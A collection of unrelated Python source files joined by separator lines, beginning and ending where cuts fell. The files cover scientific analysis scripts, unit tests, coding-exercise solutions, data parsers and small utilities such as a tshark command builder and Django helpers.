yy_flat = yy_flat[np.invert(inside)]
return xx_flat, yy_flat
def apply_transform(xx, yy, transform):
xx = np.array(xx, copy=False)
yy = np.array(yy, copy=False)
xx_flat = np.ravel(xx)
transformed = transform @ np.vstack([xx_flat, np.ravel(yy), np.ones_like(xx_flat)])
xx_transformed = transformed[0]
yy_transformed = transformed[1]
xx_transformed.shape = xx.shape
yy_transformed.shape = yy.shape
return xx_transformed, yy_transformed
def create_bb_points_function(bb_diameter):
max_distance = bb_diameter * 0.5
min_distance = 0
num_steps = 11
min_dist_between_points = (max_distance - min_distance) / num_steps
distances = np.arange(
min_distance, max_distance + min_dist_between_points, min_dist_between_points
)
x = []
y = []
dist = []
for _, distance in enumerate(distances):
(
new_x,
new_y,
) = pymedphys._utilities.createshells.calculate_coordinates_shell_2d( # pylint: disable = protected-access
distance, min_dist_between_points
)
x.append(new_x)
y.append(new_y)
dist.append(distance * np.ones_like(new_x))
x = np.concatenate(x)
y = np.concatenate(y)
dist = np.concatenate(dist)
def points_to_check(bb_centre):
x_shifted = x + bb_centre[0]
y_shifted = y + bb_centre[1]
return x_shifted, y_shifted
return points_to_check, dist
def create_centralised_field(field, centre, rotation):
transform = translate_and_rotate_transform(centre, rotation)
def new_field(x, y):
x_prime, y_prime = apply_transform(x, y, transform)
return field(x_prime, y_prime)
return new_field
|
try:
from django.core.exceptions import ImproperlyConfigured
except ImportError:
ImproperlyConfigured = ImportError
try:
from .base import ViewSet
from .model import ModelViewSet
# Allows to see module metadata outside of a Django project
# (including setup.py).
except (ImportError, ImproperlyConfigured):
pass
from .patterns import PK, SLUG
__author__ = 'Bertrand Bordage'
__credits__ = ('Bertrand Bordage',)
__license__ = 'BSD License'
__version__ = '0.2.0'
__maintainer__ = 'Bertrand Bordage'
__email__ = 'bordage.bertrand@gmail.com'
__status__ = '3 - Alpha'
|
def main(N , A) :
A.sort()
for i in range(N - 1) :
if A[i] == A[i + 1] :
return "NO"
return "YES"
N = int(input())
A = list(map(int , input().split()))
print(main(N , A)) |
from pydantic import BaseModel, validator
import re
import os.path
class TranslationModel(BaseModel):
metadata: list
content_data: list
language: str
draft_by: str
slug: str
permalink: str
created_by: str
allowed_children: str
title: str
is_published: str
file: str
@validator('language', 'draft_by', 'created_by', 'title', 'is_published')
def must_be_int(cls, v):
if re.match('^[0-9]*$', v) is None:
raise ValueError('Must contain only numbers')
return v.title()
@validator('file')
def must_file_exist(cls, v):
if os.path.exists(v) is False:
raise ValueError('Must contain path to existing file')
return v.title()
|
__author__ = 'cboys'
import re
import json
import sys
##########################################################
##
## features_parser.py
##
## Code to parse and store the user features
## from the Kaggle Facebook egonets data.
## Take features.txt as input and output a list of
## key-value dictionaries, one for each user, with more
## sensible key names.
##
## 25-10-2014
##
## run as:
## python features_parser.py 'str.txt'
##
##########################################################
if __name__ == '__main__':
if len(sys.argv)<2:
print "Expected features file.."
sys.exit(0)
with open(sys.argv[1]) as f:
content=f.readlines()
contents=[]
for i in range(0,len(content)):
contents.append(content[i].split(' '))
#for item in contents:
# for entry in item:
# entry = re.sub('([\D])([;])([\D])','\g<1>_\g<3>',entry)
for i in range(0,len(contents)):
for j in range(0,len(contents[i])):
contents[i][j]=re.sub('([\D])([;])([\D])','\g<1>_\g<3>',contents[i][j])
## Question: why the hell didn't that work
## iterating through the list by item normally???
features_dict_list=[]
for i in range(0,len(contents)):
features_dict_list.append({})
for j in range(1,len(contents[i])):
features_dict_list[i][contents[i][j].split(';')[0]]=int(contents[i][j].split(';')[1])
with open('clean_features.txt','a') as final_file:
for item in features_dict_list:
json.dump(item,final_file)
final_file.write('\n')
# final_file=open('clean_features.txt','w')
# for item in features_dict_list:
# final_file.write('%s\n' %item)
# final_file.close()
## This really should be json so Python can
## read the dictionaries later... |
import os
from typing import Any
from unittest import TestCase
from service.steam.model import SteamUserProfile, SteamMembersPage, SteamGroupMember, SteamErrorPage
from service.steam.parsers import SteamUserProfilePageParser, SteamParserError, SteamMembersPageParser, SteamErrorPageParser, \
NoPageParser
class MyTestCase(TestCase):
"""
Note:
This class uses MRO dependency injection
"""
def parse(self, filename: str) -> Any:
# noinspection PyUnresolvedReferences
return super().parse(self.load_asset(filename))
@staticmethod
def get_asset_path(*path_elements: str) -> str:
return os.path.join(os.getcwd(), 'assets', *path_elements)
def load_asset(self, filename: str) -> bytes:
with open(self.get_asset_path(filename), 'rb') as f:
return f.read()
def test_get_asset_path_is_correct(self):
self.assertTrue(os.path.exists(self.get_asset_path('steam-members-drake-ark-server.html')), msg=os.getcwd())
class TestSteamMembersPageParser(MyTestCase, SteamMembersPageParser):
def test_parse(self):
expected_members = [
SteamGroupMember('Vas', 'Group Owner', 'https://steamcommunity.com/id/VasVadum'),
SteamGroupMember('Raziel2212', 'Group Moderator', 'https://steamcommunity.com/id/Raziel2212'),
SteamGroupMember('Poketkobold', 'Member', 'https://steamcommunity.com/profiles/76561198112492431'),
]
page = self.parse('steam-members-drake-ark-server.html')
self.assertIsInstance(page, SteamMembersPage)
self.assertEqual(page.group_name, 'Land of Dragons Ark Server')
self.assertEqual(page.num_members, 10)
self.assertEqual(len(page.members), page.num_members)
for member in expected_members:
self.assertIn(member, page.members, msg=member)
def test_parse_non_group(self):
bad_files = [
'steam-members-error.html',
'steam-group-error.html',
]
for filename in bad_files:
with self.assertRaises(SteamParserError, msg=filename):
self.parse(filename)
class TestSteamUserProfilePageParser(MyTestCase, SteamUserProfilePageParser):
def test_parse(self):
profile = self.parse('steam-profile-vas.html')
self.assertIsInstance(profile, SteamUserProfile)
self.assertEqual(profile.url, 'https://steamcommunity.com/id/VasVadum')
self.assertEqual(profile.steam_id, '76561198023716890')
self.assertEqual(profile.name, 'Vas')
def test_parse_non_profile(self):
bad_files = [
'steam-members-drake-ark-server.html',
'steam-members-error.html',
]
for filename in bad_files:
with self.assertRaises(SteamParserError, msg=filename):
self.parse(filename)
class TestSteamErrorPageParser(MyTestCase, SteamErrorPageParser):
def test_parse(self):
error = self.parse('steam-members-error.html')
self.assertIsInstance(error, SteamErrorPage)
self.assertEqual(error.message, 'No group could be retrieved for the given URL.')
def test_parse_non_error(self):
bad_files = [
'steam-members-drake-ark-server.html',
'steam-profile-vas.html',
]
for filename in bad_files:
with self.assertRaises(SteamParserError):
self.parse(filename)
class TestParserBooleanness(MyTestCase):
def test_regular_parsers_are_true(self):
true_parsers = [
SteamUserProfilePageParser,
SteamMembersPageParser,
SteamErrorPageParser,
]
for clazz in true_parsers:
self.assertTrue(clazz, msg=clazz)
self.assertTrue(clazz(), msg=clazz)
def test_noparser_evaluates_to_false(self):
self.assertFalse(NoPageParser())
|
import os
import h5py
import numpy as np
import numpy.ma as ma
import argparse
import sys
#path to mother scripts
sys.path.append('/home/a/antonio-costa/theory_manuscript/')
import new_op_calc as op_calc
import time
from scipy.sparse import csr_matrix,lil_matrix
from scipy.integrate import trapz
def get_model(labels,delay):
lcs,P=op_calc.transition_matrix(labels,delay,return_connected=True)
inv_measure = op_calc.stationary_distribution(P)
final_labels = op_calc.get_connected_labels(labels,lcs)
R = op_calc.get_reversible_transition_matrix(P)
eigvals,eigvecs = op_calc.sorted_spectrum(R,k=2)
eigfunctions = eigvecs.real/np.linalg.norm(eigvecs.real,axis=0)
phi2 = eigfunctions[:,1]
c_range,rho_sets,thresh_idx,kmeans_labels = op_calc.optimal_partition(phi2,inv_measure,P,return_rho=True)
return P,phi2,thresh_idx
def organize_matrix(P,phi2):
y = np.argsort(phi2)
S = lil_matrix(P.shape)
S[np.arange(y.shape[0]),y]=1
A = S*P.T*S.T
return A
def compute_fpt_dist(labels,delay,kd_max=2000,tol=1e-5,dt=.01):
P,phi2,thresh_idx = get_model(labels,delay)
A = organize_matrix(P,phi2)
eigvals,eigvecs = op_calc.sorted_spectrum(A,k=2)
A_dense = A.todense()
p_star = eigvecs[:,0].real/eigvecs[:,0].real.sum()
Aaa = A_dense[:thresh_idx,:thresh_idx]
Abb = A_dense[thresh_idx:,thresh_idx:]
Aba = A_dense[:thresh_idx,thresh_idx:]
Aab = A_dense[thresh_idx:,:thresh_idx]
w_a = p_star[:thresh_idx].reshape(-1,1)
w_b = p_star[thresh_idx:].reshape(-1,1)
ua = np.ones((1,Aaa.shape[0]))
ub = np.ones((1,Abb.shape[0]))
kd_range = np.arange(kd_max)
f = np.zeros((kd_range.shape[0],2))
for kd in kd_range:
f[kd,0] = (ub*Aab*(Aaa**kd)*Aba*w_b)/(ua*Aba*w_b)
f[kd,1] = (ua*Aba*(Abb**kd)*Aab*w_a)/(ub*Aab*w_a)
if np.all(np.array([1.,1.])-f[:kd+1,:].sum(axis=0)<tol):
break
print(kd,f[:kd+1,:].sum(axis=0),flush=True)
return kd_range,f,trapz(kd_range.reshape(-1,1)*f,kd_range,axis=0)*delay*dt*.5
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('-n_clusters','--NClusters',help="num clusters",default=3162,type=int)
parser.add_argument('-idx','--Idx',help="traj idx",default=249,type=int)
parser.add_argument('-delay0','--D0',help="first delay",default=2,type=int)
parser.add_argument('-delayf','--Df',help="last delay",default=200,type=int)
args=parser.parse_args()
n_clusters = args.NClusters
d0,df = args.D0,args.Df
delay_range = np.arange(d0,df,2)
print(delay_range,flush=True)
#delay_range = np.array([10,50,100,500])
t0_ = time.time()
#path to split symbolic trajectories
f = h5py.File('/flash/StephensU/antonio/Lorenz/split_trajs/split_dtrajs_{}_clusters.h5'.format(n_clusters),'r')
d_ = f[str(args.Idx)]
labels = ma.array(d_['traj'],dtype=int)
mask = np.array(d_['mask'],dtype=int)
labels[mask==1] = ma.masked
seq_length = np.array(f['seq_length'],dtype=int)[0]
f.close()
print(labels[:10],labels.shape,labels.compressed().shape,flush=True)
dt = 0.01
#change output path
outpath = '/flash/StephensU/antonio/Lorenz/kinetic_properties/'
f = h5py.File(outpath+'kinetic_properties_{}_clusters_idx_{}_delays_{}_{}.h5'.format(n_clusters,args.Idx,d0,df),'w')
fd_delay = f.create_group('full_dist')
kd_delay = f.create_group('evaluated_steps')
#delay_range=np.arange(200,1200,200)
timps = np.zeros((delay_range.shape[0],2))
for kd,delay in enumerate(delay_range):
kd_range,fd,tscales = compute_fpt_dist(labels,delay)
timps[kd] = np.sort(tscales)
print(delay*dt,fd.sum(axis=0),timps[kd],flush=True)
fd_save = fd_delay.create_dataset(str(kd),fd.shape)
fd_save[...] = fd
kd_save = kd_delay.create_dataset(str(kd),kd_range.shape)
kd_save[...] = kd_range
#print(kd,flush=True)
timps_ = f.create_dataset('timps',timps.shape)
timps_[...]=timps
f.close()
tf_ = time.time()
print('It took {:.2f}s'.format(tf_-t0_))
if __name__ == "__main__":
main(sys.argv)
|
"""
QBO DB Connector Integration Tests
"""
import logging
from test.common.utilities import dict_compare_keys, dbconn_table_row_dict
from .conftest import dbconn
logger = logging.getLogger(__name__)
def test_accounts(qbo_ex, mock_qbo):
"""
Test QBO Extract accounts
:param qbo_ex: qbo_ex extract instance
:param mock_qbo: mock instance
:return: None
"""
qbo_ex.extract_accounts()
accounts = dbconn_table_row_dict(dbconn(), 'qbo_extract_accounts')
mock_accounts = mock_qbo.accounts.get()
assert dict_compare_keys(accounts, mock_accounts[0]) == [], \
'qbo_extract.extract_accounts has stuff that mock_qbo.accounts.get doesnt'
assert dict_compare_keys(mock_accounts[0], accounts) == [], \
'mock_qbo.accounts.get() has stuff that qbo_extract.extract_accounts doesnt'
def test_employees(qbo_ex, mock_qbo):
"""
Test QBO Extract employees
:param qbo_ex: qbo_ex extract instance
:param mock_qbo: mock instance
:return: None
"""
qbo_ex.extract_employees()
employees = dbconn_table_row_dict(dbconn(), 'qbo_extract_employees')
mock_employees = mock_qbo.employees.get()
assert dict_compare_keys(employees, mock_employees[0]) == [], \
'qbo_extract.extract_employees has stuff that mock_qbo.employees.get doesnt'
assert dict_compare_keys(mock_employees[0], employees) == [], \
'mock_qbo.employees.get() has stuff that qbo_extract.extract_employees doesnt'
def test_departments(qbo_ex, mock_qbo):
"""
Test QBO Extract departments
:param qbo_ex: qbo_ex extract instance
:param mock_qbo: mock instance
:return: None
"""
qbo_ex.extract_departments()
departments = dbconn_table_row_dict(dbconn(), 'qbo_extract_departments')
mock_departments = mock_qbo.departments.get()
assert dict_compare_keys(departments, mock_departments[0]) == [], \
'qbo_extract.extract_departments has stuff that mock_qbo.departments.get doesnt'
assert dict_compare_keys(mock_departments[0], departments) == [], \
'mock_qbo.departments.get() has stuff that qbo_extract.extract_departments doesnt'
def test_classes(qbo_ex, mock_qbo):
"""
Test QBO Extract classes
:param qbo_ex: qbo_ex extract instance
:param mock_qbo: mock instance
:return: None
"""
qbo_ex.extract_classes()
classes = dbconn_table_row_dict(dbconn(), 'qbo_extract_classes')
mock_classes = mock_qbo.classes.get()
assert dict_compare_keys(classes, mock_classes[0]) == [], \
'qbo_extract.extract_classes has stuff that mock_qbo.classes.get doesnt'
assert dict_compare_keys(mock_classes[0], classes) == [], \
'mock_qbo.classes.get() has stuff that qbo_extract.extract_classes doesnt'
def test_home_currency(qbo_ex, mock_qbo):
"""
Test QBO Extract home_currency
:param qbo_ex: qbo_ex extract instance
:param mock_qbo: mock instance
:return: None
"""
qbo_ex.extract_home_currency()
home_currency = dbconn_table_row_dict(dbconn(), 'qbo_extract_home_currency')
mock_home_currency = mock_qbo.home_currency.get()
assert dict_compare_keys(home_currency, mock_home_currency[0]) == [], \
'qbo_extract.extract_home_currency has stuff that mock_qbo.home_currency.get doesnt'
assert dict_compare_keys(mock_home_currency[0], home_currency) == [], \
'mock_qbo.home_currency.get() has stuff that qbo_extract.extract_home_currency doesnt'
def test_exchange_rates(qbo_ex, mock_qbo):
"""
Test QBO Extract exchange_rates
:param qbo_ex: qbo_ex extract instance
:param mock_qbo: mock instance
:return: None
"""
qbo_ex.extract_exchange_rates()
exchange_rates = dbconn_table_row_dict(dbconn(), 'qbo_extract_exchange_rates')
mock_exchange_rates = mock_qbo.exchange_rates.get()
assert dict_compare_keys(exchange_rates, mock_exchange_rates[0]) == [], \
'qbo_extract.extract_exchange_rates has stuff that mock_qbo.exchange_rates.get doesnt'
assert dict_compare_keys(mock_exchange_rates[0], exchange_rates) == [], \
'mock_qbo.exchange_rates.get() has stuff that qbo_extract.extract_exchange_rates doesnt'
def test_load_checks(qbo_lo, mock_qbo):
"""
Test QBO Load checks
:param qbo_lo: qbo load instance
:param mock_qbo: mock instance
:return: None
"""
sql = open('./test/common/mock_db_load.sql').read()
dbconn().executescript(sql)
check = qbo_lo.load_check(check_id='C1')
mock_check = mock_qbo.purchases.save()
assert dict_compare_keys(check, mock_check['Purchase']) == [], \
'qbo_load.load_check has stuff that mock_qbo.load_check doesnt'
assert dict_compare_keys(mock_check['Purchase'], check) == [], \
'mock_qbo.load_check has stuff that qbo_load.load_check doesnt'
def test_load_journal_entries(qbo_lo, mock_qbo):
"""
Test QBO Load journal_entries
:param qbo_lo: qbo load instance
:param mock_qbo: mock instance
:return: None
"""
sql = open('./test/common/mock_db_load.sql').read()
dbconn().executescript(sql)
journal_entry = qbo_lo.load_journal_entry(journal_entry_id='J1')
mock_journal_entry = mock_qbo.journal_entries.save()
assert dict_compare_keys(journal_entry, mock_journal_entry['JournalEntry']) == [], \
'qbo_load.load_journal_entry has stuff that mock_qbo.load_journal_entry doesnt'
assert dict_compare_keys(mock_journal_entry['JournalEntry'], journal_entry) == [], \
'mock_qbo.load_journal_entry has stuff that qbo_load.load_journal_entry doesnt'
|
class Solution:
# @param A, a list of integers
# @return an integer
def computeTrap(self, seq, peak):
l = len(seq)
acc = 0
for i in range(1, l - 1):
if peak > seq[i]:
acc = acc + (peak - seq[i])
return acc
def trap(self, A):
deltas = [0]
l = len(A)
if l == 0:
return 0
for i in range(1, l):
deltas.append(A[i] - A[i-1])
leftPeakIdx = 0
leftPeak = A[0]
rightPeak = 0
rightPeakIdx = 0
matched = False
acc = 0
while leftPeakIdx < l:
leftPeak = A[leftPeakIdx]
rightPeak = 0
for i in range(leftPeakIdx + 1, l):
if deltas[i] < 0:
continue
if deltas[i] == 0:
if A[i] == leftPeak:
leftPeak = A[i]
leftPeakIdx = i
rightPeak = 0
if deltas[i] > 0:
matched = True
if A[i] >= leftPeak:
rightPeak = A[i]
rightPeakIdx = i
acc = acc + self.computeTrap(A[leftPeakIdx:(rightPeakIdx + 1)], min(leftPeak, rightPeak))
leftPeak = rightPeak
leftPeakIdx = rightPeakIdx
rightPeak = 0
elif A[i] < leftPeak:
if (A[i] > rightPeak):
rightPeak = A[i]
rightPeakIdx = i
if i == (l - 1):
acc = acc + self.computeTrap(A[leftPeakIdx:(rightPeakIdx + 1)], min(leftPeak, rightPeak))
leftPeak = rightPeak
leftPeakIdx = rightPeakIdx
if matched:
matched = False
acc = acc + self.computeTrap(A[leftPeakIdx:(rightPeakIdx + 1)], min(leftPeak, rightPeak))
leftPeakIdx = rightPeakIdx
else:
leftPeakIdx = leftPeakIdx + 1
return acc
|
#!/usr/bin/env python3
from . import tshark
def get_result(input_files, filter, format, output_file):
results = []
for file in input_files:
command = tshark.make_tshark_command(file, filter, format, output_file)
results.append(command)
return {'commands': results}
|
"""
Pipeline to generate ascii files of the MW particles, LMC bound particles and
MW+LMC unbound particles
author: github/jngaravitoc
12/2019
Code Features:
- Compute BFE expansion from a collection of snapshots
- It separates a satellite galaxy from a host galaxy
- Compute COM of satellite and host galaxy
- Compute bound and satellite unbound particles
- Run in parallel
TODO:
Implement all input parameters:
- Make a parameter file
Implement all optional outputs:
- random halo sample
- output ascii files
- what if the COM is provided? **
- use ids to track bound - unbound particles -- think about cosmo
zooms
- track bound mass fraction *
Implement checks:
- equal mass particles (DONE)
- com accuracy check
- BFE monopole term amplitude -- compute nmax=20, lmax=0 and check
larger term is 000
Implement tests for every function**
Implement parallel computation for bound satellite particles.
* : fast to implement
** : may need some time to implement
- known issues:
- currently multiprocessing return the following error when many
particles are used:
struct.error: 'i' format requires -2147483648 <= number <= 2147483647
This is a known issue of multiprocessing that apparently is solved in
python3.8
see :
https://stackoverflow.com/questions/47776486/python-struct-error-i-format-requires-2147483648-number-2147483647
"""
import numpy as np
import sys
import schwimmbad
import LMC_bounded as lmcb
import gadget_to_ascii as g2a
import reading_snapshots as reads
import coeff_parallel as cop
from argparse import ArgumentParser
def main(pool, nmax, lmax, r_s, var=True):
worker = cop.Coeff_parallel(pos, mass, r_s, var)
tasks = cop.nlm_list(nmax, lmax)
results = pool.map(worker, tasks)
pool.close()
return results
if __name__ == "__main__":
#snap_names = ["MWLMC3_100M_new_b0_090",
# "MWLMC3_100M_new_b1_091",
# "MWLMC4_100M_new_b0_114",
# "MWLMC4_100M_new_b1_115",
# "MWLMC5_100M_new_b1_110",
# "MWLMC5_100M_new_b0_109",
# "MWLMC6_100M_new_b0_2_113",
# "MWLMC6_100M_new_b1_2_114"]
parser = ArgumentParser(description="")
parser.add_argument(dest="in_path", default="",
type=str, help="Number of processes (uses multiprocessing.)")
parser.add_argument(dest="snapname", default="",
type=str, help="Number of processes (uses multiprocessing.)")
parser.add_argument(dest="out_name", default="",
type=str, help="Number of processes (uses multiprocessing.)")
parser.add_argument(dest="nmax", default="",
type=int, help="Number of processes (uses multiprocessing.)")
parser.add_argument(dest="lmax", default="",
type=int, help="Number of processes (uses multiprocessing.)")
parser.add_argument(dest="rs", default="",
type=float, help="Number of processes (uses multiprocessing.)")
parser.add_argument(dest="n_halo_part", default="",
type=int, help="Number of processes (uses multiprocessing.)")
group = parser.add_mutually_exclusive_group()
group.add_argument("--ncores", dest="n_cores", default=1,
type=int, help="Number of processes (uses multiprocessing.)")
group.add_argument("--mpi", dest="mpi", default=False,
action="store_true", help="Run with MPI.")
args = parser.parse_args()
print(args.in_path)
print(args.snapname)
print(args.out_name)
print(args.nmax)
print(args.nmax)
print(args.lmax)
print(args.rs)
print(args.n_halo_part)
print(args.n_cores)
print(args.mpi)
npart_sample = 1000000
#n_part_sample_sat = 1000000
rcut_halo = 400
sample = 0
sample_lmc = 0
init_snap=91
final_snap=92
snaps_ascii=False
#for i in range(0, len(snap_names)):
for i in range(init_snap, final_snap):
print("**************************")
print("Computing ascii files on snapshot {}".format(i))
halo = reads.read_snap_coordinates(args.in_path, args.snapname+"{:03d}".format(i), args.n_halo_part, com_frame='MW', galaxy='MW')
# read_snap_coordinates returns pos, vel, pot, mass
pos_halo_tr, vel_halo_tr, mass_tr, ids_tr = g2a.truncate_halo(halo[0], halo[1], halo[3], halo[4], rcut_halo)
pos_halo_tr, vel_halo_tr, mass_tr = g2a.sample_halo(pos_halo_tr, vel_halo_tr, mass_tr, npart_sample)
#satellite = reads.read_snap_coordinates(args.in_path, args.snapname+"{:03d}".format(i), args.n_halo_part, com_frame='sat', galaxy='sat')
#pos_sat_tr, vel_sat_tr, mass_sat_tr, ids_sat_tr = g2a.truncate_halo(satellite[0], satellite[1], satellite[3], satellite[4], rcut_halo)
#pos_sat_em, vel_sat_em, mass_sat_em, ids_sat_em = g2a.npart_satellite(pos_sat_tr, vel_sat_tr, ids_sat_tr, mass_sat_tr[0], mass_tr[0])
"""
assert np.abs(mass_sat_em[0]/mass_tr[0]-1)<1E-3, 'Error: particle mass of satellite different to particle mass of the halo'
# Outs:
if snaps_ascii==True:
out_snap_host = 'MW_{}_{}'.format(int(len(pos_halo_tr)/1E6), snapname+"{}".format(i))
out_snap_sat= 'LMC_{}_{}'.format(int(len(pos_sat_em)/1E6), snapname+"{}".format(i))
#write_log([n_halo_part, halo[3][0], len(pos_sample), mass_sample], [len(pos_sat_tr[0]), satellite[3][0], len(pos_sat_em), mass_sat_em])
write_snap_txt(out_path_MW, out_snap_host, pos_halo_tr, vel_halo_tr, mass_tr, ids_tr)
write_snap_txt(out_path_LMC, out_snap_sat, pos_sat_em, vel_sat_em, mass_sat_em, ids_sat_em)
#write_snap_txt(out_path_LMC, out_snap_sat, satellite[0], satellite[1], satellite[3], satellite[4])
# Satellite bound particles
#pos, vel, mass, ids = reading_particles(snapname)
# TODO: parallelize this part!
print('Computing bound particles!')
armadillo = lmcb.find_bound_particles(pos_sat_em, vel_sat_em, mass_sat_em, ids_sat_em, args.rs, args.nmax, args.lmax)
print('Bound particles computed')
pos_bound = armadillo[0]
vel_bound = armadillo[1]
N_bound = armadillo[2]
ids_bound = armadillo[3]
pos_unbound = armadillo[4]
vel_unbound = armadillo[5]
ids_unbound = armadillo[6]
lmc_bound = np.array([pos_bound[:,0], pos_bound[:,1], pos_bound[:,2],
vel_bound[:,0], vel_bound[:,1], vel_bound[:,2],
ids_bound]).T
lmc_unbound = np.array([pos_unbound[:,0], pos_unbound[:,1], pos_unbound[:,2],
vel_unbound[:,0], vel_unbound[:,1], vel_unbound[:,2],
ids_unbound]).T
print('Combining satellite unbound particles with host particles')
pos_host_sat = np.vstack((pos_halo_tr, pos_unbound))
vel_host_sat = np.vstack((vel_halo_tr, vel_unbound))
#ids_host_sat = np.hstack((ids_halo_tr, ids_unbound))
#fbound_mass = len(pos_sat)
mass_array = np.ones(len(pos_host_sat[:,0]))*mass_sat_em[0]
print(mass_array[0])
mw_lmc_unbound = np.array([pos_host_sat[:,0], pos_host_sat[:,1], pos_host_sat[:,2],
vel_host_sat[:,0], vel_host_sat[:,1], vel_host_sat[:,2],
mass_array]).T
## TODO: include out_path
np.savetxt(args.out_name, lmc_bound)
print('Done writing snapshot with satellite bounded particles')
np.savetxt("unbound"+args.out_name, mw_lmc_unbound)
print('Done writing snapshot with satellite unbounded particles')
## Run bfe here!
## TODO: quick test run BFE with lmax=0 and nmax=20 to check that the first term is the largest
"""
pool = schwimmbad.choose_pool(mpi=args.mpi,
processes=args.n_cores)
#results = cop.main(pool, pos_host_sat, mass_array, args.nmax, args.lmax, args.rs, var=True)
pos = pos_halo_tr
mass = mass_tr
results = main(pool, args.nmax, args.lmax, args.rs, var=True)
#cop.write_coefficients("test_coefficients.txt", Snlm, varSnlm, Tnlm, varTnlm, varSTnlm, args.nmax, args.lmax, args.rs)
|
# https://www.codewars.com/kata/58ba6fece3614ba7c200017f
def is_palindrome_1(number):
if type(number) != int or number < 0:
return 'Not valid'
return str(number) == (str(number))[::-1]
# return str(num) == str(num)[::-1] if type(num) == int and num > 0 else "Not valid"
# print(is_palindrome('5'))
# print(is_palindrome(5))
# print(is_palindrome(53))
# print(is_palindrome(535))
# https://www.codewars.com/kata/numerical-palindrome-number-1-dot-5
# For this kata, single digit numbers will not be considered numerical palindromes
def palindrome_seq(num, k):
if type(num) != int or type(k) != int or num < 0 or k < 0:
return 'Not valid'
palindromes = []
number = max(num, 11)
while k > 0:
if str(number) == (str(number))[::-1]:
palindromes.append(number)
k -= 1
number += 1
return palindromes
print(palindrome_seq(6, 4))
print(palindrome_seq(59, 3))
print(palindrome_seq(1221, "8"))
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 5 19:03:18 2015
@author: lucas
"""
import os
import codecs
from dominio.entidades import Documento
# REVISADO EM 11-09-2015
class ArquivoUtil(object):
"""Documentar
"""
@staticmethod
def ler_documentos(documentos_path, categoria):
"""Lê todos os documentos '.txt' localizados no diretório
'documentos_path' recebido por parâmetro.
"""
documentos = [] # Documentos lidos
for nome_documento in os.listdir(documentos_path):
if nome_documento.endswith('.txt'):
# Lê todos os novos documentos coletados e monta uma
# lista com o conteúdo de todos estes documentos.
with codecs.open(documentos_path + '/' + nome_documento, 'r', 'utf-8') as f:
texto = f.read()
documentos.append(Documento(texto, categoria, None, nome_documento))
return documentos
@staticmethod
def get_stoplist():
stoplist_f = "/home/lucas/Documents/mineracao_opiniao/dicionario_palavras/stoplist_portugues.txt"
# Primeiramente lê a stoplist
with codecs.open(stoplist_f, 'r', 'utf-8') as f:
stoplist = f.readlines()
# Remove o '\n' do final de cada palavra
stoplist_corrigida = [stopword.rstrip("\n") for stopword in stoplist]
return stoplist_corrigida
@staticmethod
def gravar_documento_processado(documento, diretorio_destino):
with codecs.open(diretorio_destino + "/" + documento.nome, 'w', 'utf-8') as f:
f.write(documento.texto)
return True
|
"""
General utilities used within saucebrush that may be useful elsewhere.
"""
def get_django_model(dj_settings, app_label, model_name):
"""
Get a django model given a settings file, app label, and model name.
"""
from django.conf import settings
if not settings.configured:
settings.configure(DATABASE_ENGINE=dj_settings.DATABASE_ENGINE,
DATABASE_NAME=dj_settings.DATABASE_NAME,
DATABASE_USER=dj_settings.DATABASE_USER,
DATABASE_PASSWORD=dj_settings.DATABASE_PASSWORD,
DATABASE_HOST=dj_settings.DATABASE_HOST,
INSTALLED_APPS=dj_settings.INSTALLED_APPS)
from django.db.models import get_model
return get_model(app_label, model_name)
def string_dig(element, separator=''):
"""
Dig into BeautifulSoup HTML elements looking for inner strings.
If element resembled: <p><b>test</b><em>test</em></p>
then string_dig(element, '~') would return test~test
"""
if element.string:
return element.string
else:
return separator.join([string_dig(child)
for child in element.findAll(True)])
def flatten(item, prefix='', separator='_', keys=None):
"""
Flatten nested dictionary into one with its keys concatenated together.
>>> flatten({'a':1, 'b':{'c':2}, 'd':[{'e':{'r':7}}, {'e':5}],
'f':{'g':{'h':6}}})
{'a': 1, 'b_c': 2, 'd': [{'e_r': 7}, {'e': 5}], 'f_g_h': 6}
"""
# update dictionaries recursively
if isinstance(item, dict):
# don't prepend a leading _
if prefix != '':
prefix += separator
retval = {}
for key, value in item.iteritems():
if (not keys) or (key in keys):
retval.update(flatten(value, prefix + key, separator, keys))
else:
retval[prefix + key] = value
return retval
#elif isinstance(item, (tuple, list)):
# return {prefix: [flatten(i, prefix, separator, keys) for i in item]}
else:
print item, prefix
return {prefix: item}
def str_or_list(obj):
if isinstance(obj, str):
return [obj]
else:
return obj
#
# utility classes
#
class Files(object):
def __init__(self, *args):
self.paths = []
for arg in args:
self.add(arg)
self.file_open_callback = None
def add(self, path):
self.paths.append(path)
def __iter__(self):
return self.linereader()
def linereader(self):
import os
for path in iter(self.paths):
if os.path.exists(path):
if self.file_open_callback:
self.file_open_callback(path)
f = open(path)
for line in f:
yield line
f.close()
|
#!/bin/python
#-*- coding: utf-8 -*-
import os,shutil,sys
import numpy as np
import pylab as pl
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
x=[1,10,20,30,40,50,60,70,80,90,100]
interest = [10,15,20]
cluster = [200,500]
y=[]
config = []
for k in interest:
for c in cluster:
F = []
for i in x:
root = 'rec_origine/rec_' + str(i) + '/loc/'
pro = os.listdir(root)
score = 0
precision = 0
recall = 0
#print pro
for j in pro:
#print j[len(j)-4:len(j)]
if j == 'loc' or j[len(j)-4:len(j)] == '.txt':
continue
path = root + j + '/' + str(k) + '_' + str(c) + '/simcity.txt'
count = 1
with open(path) as f:
for line in f:
if line.strip() == j:
score += 1/float(count)
break
count += 1
F.append(score/34)
F.sort()
y.append(F)
config.append([k,c])
GA=[]
with open('GMM_avg.txt') as ga:
for line in ga:
temp = np.array([float(e) for e in line.strip().split(', ')])
GA.append(temp)
marker = ['s','p','*','h','D','H']
color = ['b','g','r','c','m','y']
line = ['-','--']
for p in xrange(len(y)):
pl.plot(x,y[p], marker =marker[p],color = color[p],label=str(config[p]))
pl.plot(x,GA[0],'--',label='GMM_200')
pl.plot(x,GA[1],'--',label='GMM_500')
pl.plot(x,GA[2],'-.',label='avg')
pl.legend(loc = 'upper left',ncol = 3)
pl.title('Retrieval accuracy')
pl.xlabel('Input number')
pl.ylabel('Mean reciprocal ranking')
pl.xlim(0,100)
pl.ylim(0,0.6)
pl.grid(True)
pl.savefig('mrr.jpg')
pl.close()
'''
plt.bar(x,F,alpha = .5, color = 'r')
plt.title('Distribution of F-score over numbers of input images')
plt.xlabel('Input number')
plt.ylabel('F-score')
plt.xlim(0,100)
plt.ylim(0,F[len(y)-1])
plt.savefig('Fscore.jpg')
plt.close()
